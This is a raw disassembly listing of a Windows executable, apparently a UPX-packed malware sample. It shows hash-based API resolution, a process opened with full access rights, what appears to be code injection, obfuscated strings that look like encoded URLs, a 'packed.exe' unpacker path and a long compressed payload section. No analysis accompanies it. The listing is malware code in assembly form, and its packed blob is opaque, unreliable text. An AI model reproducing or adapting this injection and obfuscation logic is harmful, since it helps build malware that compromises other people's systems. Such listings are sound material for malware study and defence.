cmp eax, 0B7h
ja short loc_402B13
inc dword_404104
loc_402B13: ; CODE XREF: sub_402950+1BB�j
push 80DBBE07h
push 6
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+arg_4]
push ecx
push 20h
push esi
call eax
test eax, eax
mov esi, offset dword_404108
jz loc_402BDE
push 10h
push esi
push offset dword_4031FC
call sub_40102C
push 1B3D12B9h
push 6
call sub_401117
add esp, 14h
lea ecx, [ebp+var_8]
push ecx
push esi
push 0
call eax
test eax, eax
jz short loc_402BDE
push 28h
pop eax
push 1Eh
pop ecx
loc_402B66: ; CODE XREF: sub_402950+22B�j
cmp ecx, 0CAh
ja short loc_402B70
inc eax
inc ecx
loc_402B70: ; CODE XREF: sub_402950+21C�j
add eax, 24h
add ecx, 24h
cmp eax, 8Dh
jl short loc_402B66
mov edi, [ebp+arg_4]
mov dword_404104, eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
push 7A2167DCh
push 6
mov [ebp+var_18], ebx
mov [ebp+var_10], eax
mov [ebp+var_C], 2
call sub_401117
pop ecx
pop ecx
xor ecx, ecx
push ecx
push ecx
push ecx
lea edx, [ebp+var_18]
push edx
push ecx
push edi
call eax
mov edi, [ebp+arg_4]
push 723EB0D5h
push ebx
call sub_401117
pop ecx
pop ecx
push edi
call eax
mov eax, dword_404104
add eax, 0FFFFFFF4h
cmp eax, 0C0h
ja short loc_402BDE
inc dword_404104
loc_402BDE: ; CODE XREF: sub_402950+1E1�j
; sub_402950+20E�j ...
cmp dword_404104, 0C2h
jge short loc_402BF0
inc dword_404104
loc_402BF0: ; CODE XREF: sub_402950+298�j
push 8
pop ecx
push 0Ch
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset dword_403240
rep stosd
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_401497
mov esi, eax
test esi, esi
pop ecx
jz loc_402CB3
cmp dword_404104, ebx
jl short loc_402C37
inc dword_404104
loc_402C37: ; CODE XREF: sub_402950+2DF�j
cmp dword_404104, 0CBh
jle short loc_402C4D
mov dword_404104, 16h
loc_402C4D: ; CODE XREF: sub_402950+2F1�j
push 99A4299Dh
push ebx
call sub_401117
pop ecx
pop ecx
push esi
push 0
push 1F0FFFh
call eax
mov esi, eax
test esi, esi
jz short loc_402CB3
push 0
push esi
push offset sub_4027DB
call sub_402455
add esp, 0Ch
push 5
pop eax
push 0FFFFFFA6h
pop ecx
loc_402C80: ; CODE XREF: sub_402950+342�j
cmp ecx, 71h
ja short loc_402C87
inc eax
inc ecx
loc_402C87: ; CODE XREF: sub_402950+333�j
add eax, 0Bh
add ecx, 0Bh
cmp eax, 93h
jl short loc_402C80
push 723EB0D5h
push ebx
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
jmp short loc_402CB3
; ---------------------------------------------------------------------------
loc_402CAB: ; CODE XREF: sub_402950+19�j
call sub_401BD8
xor ebx, ebx
inc ebx
loc_402CB3: ; CODE XREF: sub_402950+2D3�j
; sub_402950+318�j ...
cmp dword_404104, 4
jl short loc_402CC2
inc dword_404104
loc_402CC2: ; CODE XREF: sub_402950+36A�j
cmp dword_404104, 0C7h
jle short loc_402CD8
mov dword_404104, 24h
loc_402CD8: ; CODE XREF: sub_402950+37C�j
push 95902B19h
push ebx
call sub_401117
pop ecx
pop ecx
push 0
call eax
loc_402CE9: ; CODE XREF: sub_402950+182�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_402950 endp
; =============== S U B R O U T I N E =======================================
sub_402CF0 proc near ; CODE XREF: sub_401497+8�p
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_402D04: ; CODE XREF: sub_402CF0+29�j
cmp ecx, eax
jb short loc_402D12
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_402D12: ; CODE XREF: sub_402CF0+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_402D04
sub_402CF0 endp
; ---------------------------------------------------------------------------
align 4
dd 0B9h dup(0)
dword_403000 dd 77E73167h ; DATA XREF: sub_401497+25A�r
; sub_401BD8+138�r ...
dword_403004 dd 77E76A2Eh ; DATA XREF: sub_401497+1AE�r
; sub_401497+21F�r ...
dword_403008 dd 77E74672h ; DATA XREF: sub_401497+13B�r
; sub_401497+187�r
dword_40300C dd 77E74155h ; DATA XREF: sub_401497+278�r
; sub_401782+90�r ...
dd 0
dword_403014 dd 77D4C96Ah ; DATA XREF: sub_401BD8+102�r
; sub_401BD8+661�r ...
dd 0
dword_40301C dd 0E367E16Ch, 0C2CC4CE3h, 0E3E3E7h ; DATA XREF: sub_401117+A9�o
dword_403028 dd 63E3EC6Fh, 0E7C2E262h, 0E3E3h ; DATA XREF: sub_401117+9A�o
dword_403034 dd 61E2616Eh, 0C2EF67E2h, 0E3E3E7h ; DATA XREF: sub_401117+8B�o
; sub_401BD8+14�o
dword_403040 dd 0ED656CEDh, 0E3E7C261h, 0E3h ; DATA XREF: sub_401117+7C�o
dword_40304C dd 65EEE765h, 0CC4C61EDh, 0E3E3E7C2h, 0 ; DATA XREF: sub_401117+6D�o
dword_40305C dd 6CEC67EEh, 0C2E26261h, 0E3E3E7h ; DATA XREF: sub_401117+47�o
dword_403068 dd 0EAh ; DATA XREF: sub_401497+263�o
dword_40306C dd 0E164EE6Ch, 0C2EF6C62h, 67E967h ; DATA XREF: sub_401497+1E3�o
dword_403078 dd 4DEC67EEh, 49h ; DATA XREF: sub_401782+7B�o
dword_403080 dd 4BE761C6h, 0 ; DATA XREF: sub_401BD8+7BC�o
dword_403088 dd 0E76264C6h, 4BCC67h ; DATA XREF: sub_401BD8+6E7�o
dword_403090 dd 6F47h ; DATA XREF: sub_401BD8+647�o
aFqmFbbuAsajecu db 'ìäïmìäbbãÂíáíJeçîKeçîNLOÆdbçgMK',0 ; DATA XREF: sub_401BD8+5FE�o
aFclaacs db 'äclííçè',0 ; DATA XREF: sub_401BD8+56A�o
aQaFbicucfAsa db 'ïíìäbicîæfÂíáí',0 ; DATA XREF: sub_401BD8+4FB�o
align 4
aUfiaAsa db 'îäiaìÂíáí',0 ; DATA XREF: sub_401BD8+48F�o
align 4
aIfsogFdAsa db 'iäéogìädÂíáí',0 ; DATA XREF: sub_401BD8+423�o
align 4
aAscddAsa db 'íèæddÂíáí',0 ; DATA XREF: sub_401BD8+3B7�o
align 4
aCdlufsoAsa db 'çdlãäáoÂíáí',0 ; DATA XREF: sub_401BD8+34B�o
aUbssa db 'ãbéáa',0 ; DATA XREF: sub_401BD8+2F1�o
align 4
aD db 'dÈ',0 ; DATA XREF: sub_401BD8+2AF�o
; sub_401BD8+37A�o ...
align 4
aBceUsuAsajecuk db 'bçe`ãáîÂíáíJeçîKeçîNLO',0 ; DATA XREF: sub_401BD8+27D�o
align 4
dword_403124 dd 0FBC864h ; DATA XREF: sub_401BD8+246�o
; sub_401BD8+5B5�o
aSqqaBbiftfaqoc db 'áïïíÈBBifâfíïoçeaÂäaèBíìbflBìàíclB',0 ; DATA XREF: sub_401BD8+22C�o
align 4
aSqqaBbifiimqmg db 'áïïíÈBBifiimïmgiíÂá`BíìbflBìàíclB',0 ; DATA XREF: sub_401BD8+222�o
align 10h
dword_403170 dd 66E063FBh, 0E7EC6065h, 0E967C26Fh, 67h ; DATA XREF: sub_401BD8+1D0�o
dword_403180 dd 6E6063FBh, 0E967C263h, 67h ; DATA XREF: sub_401BD8+1B6�o
dword_40318C dd 6366EFFBh, 0E4E063EEh, 0E967C265h, 67h ; DATA XREF: sub_401BD8+19C�o
dword_40319C dd 0E3EEE7FBh, 0E1EEE6E1h, 0E967C26Fh, 67h ; DATA XREF: sub_401BD8+182�o
dword_4031AC dd 6FEEEFFBh, 6F6FE269h, 0E967C2EDh, 67h ; DATA XREF: sub_401BD8+168�o
dword_4031BC dd 0ED69E2FBh, 67E9E26Ch, 0E967C2E7h, 67h ; DATA XREF: sub_401BD8+14E�o
dword_4031CC dd 6EE3E9FBh, 0C2E9626Ch, 67E967h ; DATA XREF: sub_401BD8+129�o
dword_4031D8 dd 0E747h ; DATA XREF: sub_401BD8+F0�o
dword_4031DC dd 0FBC874h ; DATA XREF: sub_401BD8+C2�o
dword_4031E0 dd 0E2EC6760h, 0CC4CE367h, 0E3E3E7C2h, 0 ; DATA XREF: sub_401BD8+4F�o
dword_4031F0 dd 0EC676C6Fh, 0E7C2CC4Ch, 0E3E3h ; DATA XREF: sub_401BD8+34�o
dword_4031FC dd 67F7677Ch, 0FD666FE4h, 61EE61ECh, 676667E3h, 0
; DATA XREF: sub_402950+1EA�o
dword_403210 dd 0E3E7EFE2h, 0E3E7C2E3h, 0E3h ; DATA XREF: sub_402455+127�o
dword_40321C dd 6573EFF2h, 6761FEEDh, 7CE6726Eh, 61EF6467h, 0E262h
; DATA XREF: sub_402455+107�o
dword_403230 dd 64EE6CFBh, 0EF6C62E1h, 67E967C2h, 0 ; DATA XREF: sub_4027DB+8E�o
dword_403240 dd 0E3EDE967h, 0EC67EC62h, 67E967C2h, 36Dh dup(0)
; DATA XREF: sub_402950+CF�o
; sub_402950+2AB�o
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_4023FD+F�o
; sub_402950+194�o
align 4
dd 3Ah dup(0)
dword_404104 dd 1Fh ; DATA XREF: sub_401117+3�r
; sub_401117+15�w ...
dword_404108 dd 6C64746Eh, 6C642E6Ch, 6Ch, 3Dh dup(0) ; DATA XREF: sub_401117+41�o
; sub_401117+67�o ...
byte_404208 db 1 ; DATA XREF: sub_401302+37�r
; sub_401302+75�w
byte_404209 db 1 ; DATA XREF: sub_401302:loc_401330�r
; sub_401302+45�w
align 4
dword_40420C dd 0 ; DATA XREF: sub_4027DB+FA�o
; sub_4027DB+11A�r
dword_404210 dd 0 ; DATA XREF: sub_4027DB+114�r
; sub_4027DB+131�r
align 2000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 406000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_406000 dd 58h, 2000h, 74736C01h, 79706372h, 6C010041h, 63727473h
; DATA XREF: start+1�o
dd 4169706Dh, 736C0100h, 656C7274h, 100416Eh, 7274736Ch
dd 41746163h, 650000h, 20140000h, 77010000h, 69727073h
dd 4166746Eh, 0
dd 1FF00000h, 62B1301h, 6090620h, 6090609h, 140D0609h
dd 1D112318h, 2A115D11h, 0C060919h, 2F0F080Ah, 530C0C1Fh
dd 940092Ah, 0C500928h, 61091816h, 0A4C250Ch, 101C110Ch
dd 28133D08h, 9491608h, 161B0C06h, 6400C06h, 410C0616h
dd 6085110h, 5E09450Ch, 104E9416h, 13551029h, 2006753Bh
dd 5343F1Bh, 5261329h, 1A1A150Bh, 441A1A1Ah, 371A0A0Eh
dd 2F5A4232h, 323A323Dh, 353A323Ah, 0C354B3Ah, 15064908h
dd 38191024h, 1B19102Bh, 1D0C0609h, 2C13392Eh, 0C061B65h
dd 0C06092Dh, 13050670h, 330C3408h, 3B5A3109h, 0D4C600Fh
dd 1E102F48h, 6160638h, 121A180Ch, 1205061Bh, 93D1115h
dd 0B890C06h, 6091A15h, 232E2A0Ch, 0E1E101Ah, 6104946h
dd 1A15100Ch, 290C0608h, 6091A2Dh, 4550000Ch, 14C0000h
dd 93380004h, 4661h, 0
dd 0E00000h, 10B0102h, 1E000008h, 0C000000h, 0
dd 29500000h, 10000000h, 30000000h, 0
dd 10000040h, 2000000h, 40000h, 0
dd 40000h, 0
dd 60000000h, 4000000h, 0
dd 20000h, 400h, 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 32500000h, 3C0000h, 6 dup(0)
dd 50000000h, 1DC0000h, 0Ch dup(0)
dd 30000000h, 1C0000h, 6 dup(0)
dd 742E0000h, 747865h, 1D1B0000h, 10000000h, 1E000000h
dd 4000000h, 3 dup(0)
dd 200000h, 722E6000h, 61746164h, 2FE0000h, 30000000h
dd 4000000h, 22000000h, 3 dup(0)
dd 400000h, 642E4000h, 617461h, 21C0000h, 40000000h, 5 dup(0)
dd 400000h, 722EC000h, 636F6C65h, 2200000h, 50000000h
dd 4000000h, 26000000h, 3 dup(0)
dd 400000h, 50004200h, 32A80000h, 504A0000h, 32000000h
dd 0DB000051h, 424102FFh, 8330C183h, 88CF30C2h, 1E113B7Ch
dd 0ECE6B06Eh, 5185C963h, 987D8786h, 6978DDB7h, 0FF337A53h
dd 8B047h, 0BD17ADE8h, 0BE7D22F4h, 99A4299Dh, 822718Eh
dd 2FB65757h, 8B6FBC2Ch, 4C6485D8h, 0F16A58B4h, 7FC55659h
dd 66C71B6Fh, 2ECE4140h, 933D2E69h, 8568E965h, 0FBD87EEFh
dd 57FDC943h, 4DAD52A3h, 3B5351FCh, 4268FC75h, 0EC3BB09Dh
dd 529E6FA8h, 49EB1356h, 0F733631Eh, 708586C0h, 3271006Ah
dd 6B0777D8h, 0FF6A1677h, 0B0D56835h, 1B28723Eh, 456FF672h
dd 85D8B03h, 0C2236248h, 22235B63h, 18B8F95Bh, 1FA4613h
dd 0EC1C3B3Bh, 68FF4C30h, 774393E8h, 4DD5F0B9h, 91BB344Dh
dd 0FCE86A53h, 9AEFD93Ah, 909B768Bh, 56A8AC4h, 8D51F4D5h
dd 265B5D08h, 0EC212210h, 2720EF8Ch, 5B390B94h, 0EEDE5B02h
dd 0AE23E35Dh, 0FF486BF7h, 2238860Fh, 0A78EDFB6h, 8B8B65BFh
dd 853C85B4h, 760F39F6h, 0C3667248h, 8E8F822Ah, 564C0DEEh
dd 410681Dh, 0D6538900h, 0B65C093Bh, 56FE398Dh, 0F8752F50h
dd 0FB01B644h, 680CB76Eh, 189F16C9h, 4BCECA6h, 0DB5ACF21h
dd 20A0F005h, 0D90192A3h, 0BCC8085Fh, 9168F09Eh, 39E4FB21h
dd 2F9AC75Dh, 3856FEFAh, 812358Bh, 67DF3777h, 0D6FF5074h
dd 0BD804A47h, 0F3A10E9h, 9A599985h, 0EA0C3DB1h, 0B72A305Ch
dd 8B3FEFE1h, 4E01EBF0h, 0E35BC80h, 0D8F5755Ch, 2E4B15FFh
dd 42B76720h, 0C7863A7Eh, 0B1BB701Eh, 35848DEFh, 4265054h
dd 20E08569h, 7915D810h, 74C842Dh, 15B04779h, 3DF17810h
dd 57BE44C3h, 3C9F0B02h, 0F7076C1Bh, 1B07AE94h, 185D821Dh
dd 0D151E802h, 1999B206h, 8BA4B9h, 4970ABFCh, 747B23C3h
dd 74835773h, 87FFAD60h, 51BBB37Ch, 33599903h, 6B00FD3Ah
dd 0AB0AC61Eh, 2893687Fh, 24B91D57h, 680C03FCh, 20E4E9EDh
dd 8B248BCEh, 921ACCB1h, 70171DB0h, 32732635h, 39024AAFh
dd 6F72CE42h, 0CD820F05h, 9A0D4C2Eh, 0BFE40661h, 0C1EDEA16h
dd 7C7FFC76h, 0DB33C108h, 0FC5D8935h, 0AC2E4002h, 45C7ECFDh
dd 0F07D0E0h, 0DB8DA42h, 0B26664Ah, 0FC060407h, 646E593Fh
dd 6853F784h, 534D481h, 7589036Ah, 6F4E34E8h, 0E0225321h
dd 11901C39h, 7802D662h, 5843F784h, 768992CEh, 4973EFE4h
dd 5F9B1BFAh, 593DD768h, 5200AA08h, 30FF0330h, 7DBD6613h
dd 1CA557B8h, 11FB530Ch, 1BF4753Fh, 7EC30302h, 3DC01E40h
dd 9C78688Fh, 804D1AD0h, 578D96C5h, 3002E0FEh, 11C8D818h
dd 39050632h, 2E4066ADh, 17C82984h, 0FC3761AFh, 5CE02768h
dd 8957572Fh, 0F0A5FC7Dh, 4F7420FDh, 20256877h, 888DECC9h
dd 2FA4FBFFh, 34D4A05Ch, 0F588FDEh, 0ED012587h, 3927C93Dh
dd 0F8F11447h, 80685308h, 0DB42B659h, 0BC53575Dh, 0C40454Eh
dd 6D869C30h, 91F0F356h, 212DCCFBh, 62944FB4h, 93BC2129h
dd 9D883D7Ch, 0FB415686h, 0B61E997Bh, 95463E05h, 80C0A5C0h
dd 6B6C2CB0h, 0EB4FF1DFh, 74C33A64h, 0C368DA65h, 7C0F3FD1h
dd 0BBAC9B60h, 0D8C4DC6Ch, 0F049DC3Fh, 6C2DEC7Fh, 8A797C98h
dd 636F837Ch, 20397623h, 366A9777h, 9265E434h, 318FDD66h
dd 0D8983D31h, 0FCC660C0h, 7EEB7135h, 54EBDBF7h, 0FE3DFEC0h
dd 88093203h, 4EB105Dh, 0E37828AEh, 26360B0Ah, 951ED471h
dd 0B607903Eh, 0FB0CA53Dh, 8656DE14h, 1165206Ch, 481438F4h
dd 3DAE0F38h, 91F89E8Eh, 9F0CA167h, 0F1688001h, 4AEF7CBh
dd 44790D8Bh, 5BDCC4F0h, 5B25BD9Ah, 0E4DE6415h, 116CB67h
dd 9A3DC979h, 0DADCECA9h, 74C4BF6Ah, 5E4890Fh, 0F438097Dh
dd 944BDBA9h, 6AA3EC2Eh, 59FB3E2Eh, 1CAA75DAh, 91217221h
dd 0BC428D39h, 2B20D1BBh, 51EB3004h, 8149743Ah, 3FF0ABC2h
dd 77FA7563h, 8D406A3Bh, 2BE8845h, 7704FD19h, 0C5354484h
dd 46318AC7h, 66A56241h, 84C8BA63h, 46FA00CEh, 0D7D5E4CDh
dd 8303374Ch, 4C8CFFC8h, 0B855C3B8h, 308D2D62h, 340E467Ah
dd 2C8E57BFh, 5F946BF2h, 1AF0211Fh, 8646403Bh, 0EC30E00Ch
dd 7AFD9CBCh, 0D8BF591Dh, 0DEBCF3Bh, 23943D0Dh, 0EDFFAD18h
dd 81381168h, 7D2ED57Ah, 4586D42Ah, 5979371Bh, 41619B8h
dd 0D33D6732h, 63982859h, 13265F85h, 7CC73B13h, 0DC72AFECh
dd 620CFD96h, 0DE972438h, 1B7B67ECh, 0F4F6CCFBh, 285D8FEh
dd 0CE28D82Dh, 0A10B0BAh, 56B83BD8h, 0B34914C7h, 612AD12Dh
dd 92156551h, 2FF85632h, 68F883A2h, 6619EB7Ch, 0F034BCCh
dd 1E3D8B5Eh, 6748560Eh, 0FE9FB1B1h, 240D6AD7h, 58191FBCh
dd 21320361h, 323368ACh, 9C320321h, 0C8C88C78h, 9880320h
dd 84D80C80h, 1970980Ch, 0E25C67A8h, 7D81669Fh, 0E10419DCh
dd 9025061Ch, 13D9F12Eh, 20C0F2Fh, 70D84FEh, 1781D553h
dd 930409EEh, 8BE07C59h, 7CA9D81Dh, 0E0E8B2F5h, 75216A0Ah
dd 7272821h, 75226C64h, 3FC4828h, 63207221h, 5FFD2419h
dd 0AC3B05B9h, 2FD30C50h, 67FEB836h, 16391901h, 0ECD3190Ch
dd 9A42BD96h, 7212B34h, 6C3677Eh, 3108BEC1h, 709B5625h
dd 48DE60A1h, 73715A75h, 20646401h, 1C2E0005h, 0AA01902Ch
dd 9173E49Dh, 591D11BDh, 8F4200Bh, 0CA08586Eh, 648B365Eh
dd 6B18325Bh, 9021B588h, 1E80991h, 601C9163h, 986B6EE7h
dd 7232005Dh, 1768D80Ch, 0D7801C80h, 3E4078CCh, 0E091917h
dd 0C81CBC20h, 0C6EAD95h, 723204A8h, 0DB40791h, 336B92Eh
dd 7FA3246Bh, 0ED24F12h, 89E0A6F7h, 6C8C0F02h, 0E113894Fh
dd 2A4E406Eh, 0F4D79844h, 6A763257h, 6894931Fh, 270118E2h
dd 658380D0h, 93B41D7h, 2CD24CB2h, 2F8EAA1Dh, 16EC092Fh
dd 0BF166ACCh, 1E579048h, 60B702C8h, 5E50D025h, 0E1BFFEF8h
dd 40A8A76h, 7D80A01Dh, 458800F9h, 0C60675EDh, 2030EF45h
dd 54B5BDB5h, 1304F916h, 0EFBEF0Fh, 0F0F206DBh, 5756C23Dh
dd 919AD24Ch, 0FCFC692Fh, 0ECFD1704h, 791E5B6Ch, 1904FDEEh
dd 0F6EC29EEh, 36E1AC64h, 6200F018h, 3B88E807h, 6402C583h
dd 705A8BADh, 66D82B64h, 0B6FF469Fh, 0E4848AEDh, 0E66DE578h
dd 88037430h, 4207E665h, 0E746172h, 48329767h, 52DEC297h
dd 25CFE7FCh, 0E4E4C8DBh, 4E8E4D4h, 232563C0h, 1BB60680h
dd 0E24B916Ch, 0CC3D36D8h, 25F84CE5h, 19688202h, 1095902Bh
dd 125B7E24h, 0DFBFA865h, 0D281F0F0h, 3177FD59h, 0EB003025h
dd 812C6832h, 9EDF1297h, 0D071BFECh, 2674020Bh, 9972F568h
dd 0E868143Dh, 0A0325003h, 0F257DD03h, 0FC5B8B45h, 5FC574CEh
dd 0BFC25E81h, 8C9BE294h, 0F20107Ch, 0F84F53C0h, 3C489042h
dd 0A42C803h, 8E526689h, 18417FB6h, 8938708Bh, 0E40BDC4Dh
dd 33F8BC9Bh, 25B51720h, 0A08B638Ch, 0BD1B0583h, 60FF5B49h
dd 7F88D609h, 0F7F83153h, 83FF1BDFh, 59273CE7h, 76172033h
dd 20F7470Fh, 0F84BD4CDh, 0EF0A25B7h, 0B7535607h, 6E29BF99h
dd 0C33BD0E0h, 320775B0h, 68D217BDh, 17CD9430h, 5B2DAACh
dd 25970024h, 825C352Eh, 0E40267BAh, 59CF3519h, 859265E4h
dd 303086E2h, 0E92C8A3Dh, 126A7424h, 3B1C226Fh, 2380C18Ah
dd 81BC45CCh, 817F6E09h, 10221DECh, 0C0EAEE68h, 0F08B111Fh
dd 32773389h, 1651BCC3h, 0A3CD4DE4h, 0F060B26Eh, 1C3E80Dh
dd 58C2D0Ah, 0C3EE067h, 0A67CE04Fh, 8BB18F0Ah, 3B81EC7Dh
dd 9428EA7Fh, 773ECCECh
dd 0F5AD803Bh, 48A4DC16h, 4D035014h, 0E5D27FE4h, 0E4E2368Ch
dd 0D794F72Bh, 0F12F42B7h, 8316FC97h, 0A83D16C2h, 334418Bh
dd 8D3894C7h, 0B46FFBEh, 810975FFh, 78B0678h, 7303F409h
dd 2408BEDh, 0E00C4103h, 1A6EDFFEh, 8330DEBh, 664001EBh
dd 0FA751839h, 72054040h, 6CBEE919h, 0F6A5F16h, 0C747DC54h
dd 188A5B17h, 0FF8117F1h, 9389EDE9h, 1DB52FFFh, 0C09C498Bh
dd 0FC115417h, 3A40088Ah, 802A74CBh, 0FFEDFFB5h, 773F0F9h
dd 3C9B60Fh, 0A40FEBD1h, 0FE18338h, 0B10E1C1h, 6D8B0ECFh
dd 156BB15h, 8BF22332h, 0F684B3Ah, 0FDDF6BF6h, 7D494707h
dd 84F62BF0h, 9AAD56FFh, 5475105Ah, 1874B368h, 0D248F0E6h
dd 0EB53B994h, 1820690Ch, 0A4E41D0h, 38349306h, 0D85FC068h
dd 7FE22B94h, 3D2B2F09h, 57EB0399h, 1DE02F68h, 0B4526AAAh
dd 0F0EC9606h, 0EC3D0289h, 4B95F2B6h, 2310DC10h, 2B0042C8h
dd 0A0BD897Fh, 0F0891FFDh, 387780C3h, 9567566Dh, 2C8677CDh
dd 6A575848h, 6E9265F4h, 0E504A4E9h, 6425AFA0h, 25E4BB41h
dd 538AB83Dh, 35727C58h, 571A4CC5h, 5343BF00h, 860B8093h
dd 82FA1258h, 3DC96BBFh, 9AF07ED2h, 0FF336FB8h, 0D05D53h
dd 57BA2749h, 1923132Dh, 6FDB583h, 0AD9A5395h, 0FD937373h
dd 49A1374Ah, 0EB73045Ch, 5D60FEB4h, 0C3CAB92h, 9A4BD430h
dd 6B1E2F05h, 6AFCD2F2h, 0BCFE0A08h, 3F05B857h, 0A7AB4B06h
dd 0E7BF8C5h, 97B6EC90h, 5E81D66h, 0B6CC1DB5h, 5D81C940h
dd 0B7B8B40Ch, 2E15B60Bh, 0BA8C5703h, 0E61A35FFh, 1058C5D3h
dd 0BFF0C05h, 7EC35114h, 162A536Ch, 3B681C8Bh, 497B88BFh
dd 849E6B27h, 3DCF2456h, 606F5EA6h, 2D7055A2h, 53768AE3h
dd 9472F93Bh, 0FA879DB9h, 9D76013Ch, 0B56A0CC4h, 0FD378982h
dd 88C2E263h, 0BF169D0Bh, 0B80970E0h, 4FBE5BDDh, 95E2BF03h
dd 33DE4C39h, 0A5FF6BC9h, 8D147DD8h, 11C50D94h, 2AB7A80h
dd 3B41DA8Bh, 5BEC75C8h, 8BF7637Dh, 20B80Bh, 651FC80Bh
dd 0A6C7078h, 0DBFCB2F4h, 44B8F14h, 65726F10h, 43A2E372h
dd 2E0833F9h, 0FA657865h, 0DB60FC20h, 0C1094806h, 0B05908BCh
dd 0B5B87EB0h, 0C87D72CFh, 0ABF340B5h, 5EAC4BFh, 5A09C819h
dd 6F6E4390h, 59F68507h, 10083DDh, 0B9214085h, 0FDB02BCBh
dd 68D0B7DCh, 0D51F0FFFh, 0E407447h, 0D4A3756h, 0DB1797D9h
dd 59A6EED9h, 0E3396831h, 0EB71F983h, 28BE0B0Bh, 0EC82CAC3h
dd 64BCAD89h, 1C807C6Ch, 0EC57F0E5h, 83FD8650h, 517D71Ah
dd 160D89ADh, 0F059F203h, 3DE43F71h, 4C2C07B7h, 0DBBEEB46h
dd 0CFB0B80h, 5B0F2074h, 17DF1884h, 1027A7E9h, 3E4FD82h
dd 0B9FC21BDh, 301B3D12h, 9F70915h, 0D651F899h, 2CD24C11h
dd 0AE28106Dh, 1124CA1Eh, 24BC8ADBh, 0CAA8D3Dh, 98437BBEh
dd 0DC106B70h, 7A2167DCh, 0C168DD49h, 9AE8DD46h, 7C02F4DFh
dd 4916485Bh, 8D0051F4h, 2D52E855h, 0C67B9263h, 4E808438h
dd 0CA83C80Ah, 59C03DF4h, 0C38428C2h, 4ADBE040h, 8AE6C538h
dd 0DA621D39h, 0B840B90Ah, 7C49D953h, 5318486Ah, 0B9DEBD8h
dd 66C864D4h, 6543D82Ch, 7B0CC78Ah, 0F0240671h, 1F85FF8Ah
dd 0C2128C38h, 4C42000Ch, 0C82B0424h, 0FFF7C01Bh, 0D0FD56D2h
dd 0C48BC823h, 39FF5825h, 0C18B0A72h, 508B9459h, 0D52D17h
dd 2A2DFA89h, 0BB0AA885h, 1D4707A3h, 0B100001Bh, 6C3FFB7Fh
dd 0E3E367E1h, 0E7C2CC4Ch, 0EC6F0005h, 0E26263E3h, 0EC7ECF0Ah
dd 616E00F6h, 0EF6701E2h, 656CED0Ch, 1661EDh, 0C177D865h
dd 0CEEE7DCh, 67EE0030h, 34616CECh, 377EDEFDh, 0EE6C0FEAh
dd 6C62E164h, 67E96737h, 0B7494D1Bh, 13DEFFDBh, 4BE761C6h
dd 6264C62Bh, 0ACC67E7h, 0EC0B6F47h, 0FEEBBBE4h, 36DEFDBh
dd 0C2E36262h, 4AEDE1EDh, 4E034B55h, 7D234F4Ch, 4D197FF7h
dd 0ED6C63E4h, 0E8E7EDh, 6925EDEFh, 66E6EE63h, 0EEF67F6Eh
dd 69E46F28h, 0AEC61h, 6FE9E469h, 0FF64E462h, 0EC16F61h
dd 64E6E8A7h, 6C64E70Ch, 6FE1E4E3h, 63F7516Bh, 0E962E30Dh
dd 641361E1h, 5FED5D2Eh, 60657EC8h, 75EEE1E3h, 0E100FB1Bh
dd 0DF6F6DEFh, 42C8FFDAh, 0E2666942h, 6FEFED66h, 61E4F328h
dd 628042E8h, 0BEDF6C66h, 0EC42F6ECh, 4291EDE0h, 69692300h
dd 6967C16Dh, 0DBC2C2EDh, 60E1D90Fh, 63FB0022h, 0EC6566E0h
dd 0AD056FE7h, 0F2FEC3Dh, 0B636E60h, 1FCC66EFh, 0D86D6EE6h
dd 7F0F65E4h, 0A9EEE68Eh, 0F21DBB1Fh, 696FEE1Fh, 0ED6F6FE2h
dd 0E26C62E2h, 3F6B1D0Ah, 0E90FE76Ch, 0CF6C6EE3h, 84E7470Dh
dd 0B7B34285h, 0AA046074h, 3FFF93E3h, 6C6FBDACh, 677C0D10h
dd 6FE467F7h, 61ECFD66h, 83C61EEh, 67E3EFEEh, 0E2004266h
dd 0F2CF1AEFh, 0CE073EFh, 61FEBFB7h, 0E6726E67h, 0CAEF642Ah
dd 0B9B0B663h, 600C481h, 53EC42EDh, 0BC085541h, 23202B0Fh
dd 64C784A0h, 104013h, 15CF2F09h, 1205844h, 0ECF9736Ch
dd 7274FC83h, 41797063h, 4169706Dh, 6E656C14h, 0FB669FFh
dd 31417461h, 73771465h, 6E697270h, 0DCFFF907h, 1136674h
dd 13011FF0h, 620062Bh, 0FF140D09h, 18FFB7FFh, 111D1123h
dd 192A115Dh, 80A0C0Ch, 0C1F2F0Fh, 92A530Ch, 9280940h
dd 0B7160C50h, 18FFFFDDh, 250C6109h, 110C0A4Ch, 3D08101Ch
dd 16082813h, 161B2549h, 0ED064003h, 477B7FFh, 8511041h
dd 5E094505h, 104E9416h, 13551029h, 0F75A753Bh, 1BFFEFFFh
dd 2905343Fh, 0B052613h, 44001A15h, 371A0A0Eh, 2F5A4232h
dd 13A323Dh, 0FFFEDBBFh, 354B3A35h, 649080Ch, 19102415h
dd 1B032B38h, 392E1D50h, 0FF652C13h, 1B96EFFFh, 6700C2Dh
dd 34081305h, 3109330Ch, 600F3B5Ah, 2F480D4Ch, 0EEB91E10h
dd 6D38BFB7h, 22121A18h, 11151205h, 5E89253Dh, 0DEDF6F36h
dd 232E2A06h, 460E1E1Ah, 108D1049h, 2D291A15h, 0FE25FF21h
